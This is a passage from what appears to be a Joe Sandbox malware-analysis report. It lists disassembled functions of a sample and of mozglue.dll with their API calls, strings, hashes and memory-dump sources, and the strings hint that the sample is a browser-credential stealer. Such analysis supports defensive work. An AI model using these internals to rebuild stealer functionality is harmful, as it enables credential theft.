API String ID: 145871493-2623246514
Opcode ID: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction ID: 0baf2aa69d8cf0f9d1a80e002f6a0c30601aa36f70604daba40d504ae963cc98
Opcode Fuzzy Hash: d4ad702163dedae234b04c25129513d6ca49606b68d6455ed9a7693a3667c5d7
Instruction Fuzzy Hash: 14E0B670B01302ABDF007F73C9887127BF8AB46745F044516AB0592614EBB0F652CB5F

Function 00899E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 00899F41

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00899E67
v10, xrefs: 00899EA3
@, xrefs: 00899EF1
v20, xrefs: 00899E21

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$AllocLocal
String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 4171519190-1096346117
Opcode ID: 18908b0465dd6b4eac5a3c1040f6347db76548344cba935745acab7ab243490b
Instruction ID: 42499d8b9f39c8d1da3b193dfe64281808887ed9b6f186102e03403307d9ecbc
Opcode Fuzzy Hash: 18908b0465dd6b4eac5a3c1040f6347db76548344cba935745acab7ab243490b
Instruction Fuzzy Hash: 4361FC71A00248DBDF28EFA8CC96BEE7775FF45304F048518E90ADB691DB746A05CB92

Function 6C654DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C654E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C654E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C654EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C654F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C654F1E

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
Instruction ID: fa9019ae94530c368e15ab28f76c0ca6e05641a3aa38c6ac439540feb09e902e
Opcode Fuzzy Hash: 52175f95d4ea3090ad09e7d1fb6a04a335b1bba66f3e2ef145f8db46a4b08874
Instruction Fuzzy Hash: 8C41F0716087019FC701CF29C8809ABB7E4BF8A344F608A5DF56687640DBB1E935CB85

Function 6C661530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C66159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615BC
moz_xmalloc.MOZGLUE(-00000001,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C6615E7
free.MOZGLUE(?,?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C66152B,?,?,?,?,6C661248,?), ref: 6C661637

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction ID: d01c86a85d46c23a7c691215a81a34074b03034866677b6b18a6f6f243d40b0c
Opcode Fuzzy Hash: 60c595e13ce2a9c8a199b3a496b84ba9900cf50bf30422973b7d5e0842e1335b
Instruction Fuzzy Hash: 9C31EAB1A001149BCB148E7DD8514AEB7A5FB823647240B2DE423DBFD4EB30D915879B

Function 6C6BAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAD9D

Part of subcall function 6C66CA10: malloc.MOZGLUE(?), ref: 6C66CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE01
GetLastError.KERNEL32(?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6CE330,?,6C67C059), ref: 6C6BAE3D

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction ID: 4eb5dd445afc357e947c968c0e77c1b944aa70b059dce956206679de5e0986f5
Opcode Fuzzy Hash: 0f21de2af0562fbe7cdfc5f35f1760c945e4117e18b0c4ae4a851e01653c96bd
Instruction Fuzzy Hash: FB3164B1A002159FDB10DF7A8C44AABB7F8EF49714F15482DE94AE7700E734E815CBA9

Function 6C65B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C65B532
moz_xmalloc.MOZGLUE(?), ref: 6C65B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C65B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C65B57E
free.MOZGLUE(00000000), ref: 6C65B58F

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
String ID:
API String ID: 4244350000-0
Opcode ID: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction ID: 89d8c58b405f94ff87142cdd8ce363126df9faeab29231e2da6d786d2f4b5cda
Opcode Fuzzy Hash: 4d383c59ac1466ad9845e72a84ae01ba623d94f7e40b200926ea7cdfc1fc98de
Instruction Fuzzy Hash: 3D212971A002059BDB00CF69CC80BAEBBB9FF86304F784129E918DB345E736D921C7A5

Function 008A6920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 008A696C
sscanf.NTDLL ref: 008A6999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A69B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 008A69C0
ExitProcess.KERNEL32 ref: 008A69DA

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Time$System$File$ExitProcesssscanf
String ID:
API String ID: 2533653975-0
Opcode ID: 3f4806590980dbf54ec9edd769fe109219a0a23573ed789f09f7e0fc487ae448
Instruction ID: 605c443f9daec423055942e3a01d4bd3acf505350f59057814f8c342dd293e5a
Opcode Fuzzy Hash: 3f4806590980dbf54ec9edd769fe109219a0a23573ed789f09f7e0fc487ae448
Instruction Fuzzy Hash: 3621FF75D00208ABDF04EFE4D945AEEB7B5FF58300F04452EE416E3250EB345615CB65

Function 008A9260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0156D980,?,?,?,008A140C,?,0156D980,00000000), ref: 008A926C
lstrcpyn.KERNEL32(00ADAB88,0156D980,0156D980,?,008A140C,?,0156D980), ref: 008A9290
lstrlen.KERNEL32(?,?,008A140C,?,0156D980), ref: 008A92A7
wsprintfA.USER32 ref: 008A92C7

Strings

%s%s, xrefs: 008A92B5

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 5f61cc7f968093e021ea2673b34755536d28effc10fb1796135dac1efd75bda9
Instruction ID: 1e49b90e3c5a13c336ab7669be8696adcb2a216fb7e6d26105847559b3b4e773
Opcode Fuzzy Hash: 5f61cc7f968093e021ea2673b34755536d28effc10fb1796135dac1efd75bda9
Instruction Fuzzy Hash: AC019375601108FFDB04DFE8C988AEE7BB9EB58354F108549F90A9B344C671AA419B91

Function 6C690D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C653DEF), ref: 6C690D71
VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C653DEF), ref: 6C690D84
VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C653DEF), ref: 6C690DAF

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C690D97, 6C690DBE
<jemalloc>, xrefs: 6C690D92, 6C690DB9

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 1852963964-2186867486
Opcode ID: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction ID: 9eb333f3b368d62e8b1546ca32396374ec09f74a64d74f8d664fc73b983ace28
Opcode Fuzzy Hash: 13bbc51be261d3e61bd704e20e53ec9f8c3ea23577e6d8f8bb17b6e2824cef17
Instruction Fuzzy Hash: C2F02E3138039623E72016670C0AF6A269EA7C6B35F314035F744DE9C4DA90F80486AE

Function 6C67D468 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 6C68CBE8: GetCurrentProcess.KERNEL32(?,6C6531A7), ref: 6C68CBF1
Part of subcall function 6C68CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6531A7), ref: 6C68CBFA

EnterCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D4F2
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D50B

Part of subcall function 6C65CFE0: EnterCriticalSection.KERNEL32(6C6DE784), ref: 6C65CFF6
Part of subcall function 6C65CFE0: LeaveCriticalSection.KERNEL32(6C6DE784), ref: 6C65D026

InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D52E
EnterCriticalSection.KERNEL32(6C6DE7DC), ref: 6C67D690
LeaveCriticalSection.KERNEL32(6C6DE784,?,?,?,?,?,?,?,00000000,75922FE0,00000001,?,6C68D1C5), ref: 6C67D751

Strings

MOZ_CRASH(), xrefs: 6C67D4BB

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
String ID: MOZ_CRASH()
API String ID: 3805649505-2608361144
Opcode ID: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction ID: 72be7f876658cff6d62bdf5daf5ff4cfa071adc8b61d5b6b6fcdee3ae64f8576
Opcode Fuzzy Hash: 4a4597c506335fd374026c37a78a4c4713f739f71224aa12a41bea50c1db6c0a
Instruction Fuzzy Hash: E651A071A047018FD364CF29C49465AB7F1EF89704F558E2ED59AC7B84D770E840CB6A

Function 008AC84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

___crtGetStringTypeA.LIBCMT ref: 008AC8EC
___crtLCMapStringA.LIBCMT ref: 008AC90C
___crtLCMapStringA.LIBCMT ref: 008AC931

Strings

, xrefs: 008AC896

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Type
String ID:
API String ID: 2109742289-3916222277
Opcode ID: 49e782e7d96576eef58a1135729f2ae2e3ee7e57de09e114ba1622f5ad404cbf
Instruction ID: 3ef5561f377e1279066e8ddd75329a85014ede97aed08296a3bf7a789aa69243
Opcode Fuzzy Hash: 49e782e7d96576eef58a1135729f2ae2e3ee7e57de09e114ba1622f5ad404cbf
Instruction Fuzzy Hash: 5241E87150475C9EEB258B248C84FFB7FF8FB46708F1844E8E98AC6582D2719A45CF61

Function 6C6AB410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C654290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C693EBD,6C693EBD,00000000), ref: 6C6542A9

tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6AB127), ref: 6C6AB463
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6AB4C9
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C6AB4E4

Strings

pid:, xrefs: 6C6AB4DE

Memory Dump Source

Source File: 00000000.00000002.2301550177.000000006C651000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C650000, based on PE: true

Associated: 00000000.00000002.2301525550.000000006C650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301610914.000000006C6CD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301644027.000000006C6DE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2301665427.000000006C6E2000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c650000_file.jbxd

Similarity

API ID: _getpidstrlenstrncmptolower
String ID: pid:
API String ID: 1720406129-3403741246
Opcode ID: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction ID: 08c90ab0690d7f8403227b0f2834ab55f99ceeb46082f2b9e9c56eb2096e64bc
Opcode Fuzzy Hash: f2833832c2e09ac9d0fa345bfb691ad62b155d79752d84222e94a571c01022f7
Instruction Fuzzy Hash: E431E031A0120C9FDB00DFEAD880AEEB7B5FF85318F540529D81267A45D732AD46CBA9

Function 008A6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 008A6663

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

